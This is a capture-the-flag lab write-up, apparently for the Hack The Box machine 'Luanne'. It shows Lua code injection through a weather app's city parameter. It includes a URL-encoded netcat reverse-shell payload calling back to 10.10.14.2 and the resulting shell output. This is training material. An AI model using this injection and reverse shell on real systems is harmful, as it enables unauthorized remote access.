InfoSec LAB

Luanne_Exploitation

Created: 2 min read

LUA Code Injection

I was able to discovered that one of the web servers was running a weather application off a LUA script, which then was later confirmed by enumerating the other web application running on the port 9001

While LUA applications are common, they can be exploited if not secured properly just like any other application. One of the common vulnerabilities is injection.

injection vulnerability in LUA applications are most commonly found

here is an article that lists all the potential vulnerabilities present in LUA application, and their exploits

Following one of the examples shown in the article doesn’t seem to work for a few reasons

  • The <? and ?> tags are not valid syntax in a standalone Lua script file
  • It seems that the application is using a SQL-based database to store data, thus it is necessary to exploit it accordingly

')os.execute("id")--

  • ') closes the SQL query
  • os.execute() function to inject OS command
  • -- - to comment out the rest of the SQL query

I can get code execution this way. This concludes that there is an SQL query at the value of city parameter.

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ hurl -U 'mkfifo /tmp/owntmi; nc 10.10.14.2 9999 0</tmp/owntmi | /bin/sh >/tmp/owntmi 2>&1; rm /tmp/owntmi'
 
Original    :: mkfifo /tmp/owntmi; nc 10.10.14.2 9999 0</tmp/owntmi | /bin/sh >/tmp/owntmi 2>&1; rm /tmp/owntmi
URL ENcoded :: mkfifo%20%2Ftmp%2Fowntmi%3B%20nc%2010.10.14.2%209999%200%3C%2Ftmp%2Fowntmi%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fowntmi%202%3E%261%3B%20rm%20%2Ftmp%2Fowntmi

Encoding the payload in the URL format for delivery

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ curl -s 'http://10.10.10.218/weather/forecast?city=London%27)os.execute(%27mkfifo%20%2Ftmp%2Fowntmi%3B%20nc%2010.10.14.2%209999%200%3C%2Ftmp%2Fowntmi%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fowntmi%202%3E%261%3B%20rm%20%2Ftmp%2Fowntmi%27)--%20-'

Sending the payload

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.218] 65444
whoami
_httpd
hostname
luanne.htb
/sbin/ifconfig
vmx0: flags=0x8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	capabilities=7fd80<TSO4,IP4CSUM_Rx,TCP4CSUM_Rx,TCP4CSUM_Tx>
	capabilities=7fd80<UDP4CSUM_Rx,UDP4CSUM_Tx,TCP6CSUM_Rx,TCP6CSUM_Tx>
	capabilities=7fd80<UDP6CSUM_Rx,UDP6CSUM_Tx,TSO6>
	enabled=0
	ec_capabilities=7<VLAN_MTU,VLAN_HWTAGGING,JUMBO_MTU>
	ec_enabled=2<VLAN_HWTAGGING>
	address: 00:50:56:b9:f2:06
	media: Ethernet autoselect (10Gbase-T)
	status: active
	inet 10.10.10.218/24 broadcast 10.10.10.255 flags 0x0
	inet6 fe80::250:56ff:feb9:f206%vmx0/64 flags 0x0 scopeid 0x1
lo0: flags=0x8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33624
	inet 127.0.0.1/8 flags 0x0
	inet6 ::1/128 flags 0x20<NODAD>
	inet6 fe80::1%lo0/64 flags 0x0 scopeid 0x2

Initial Foothold established to the target system as the _httpd user via LUA code injection

Interactive Graph View

Backlinks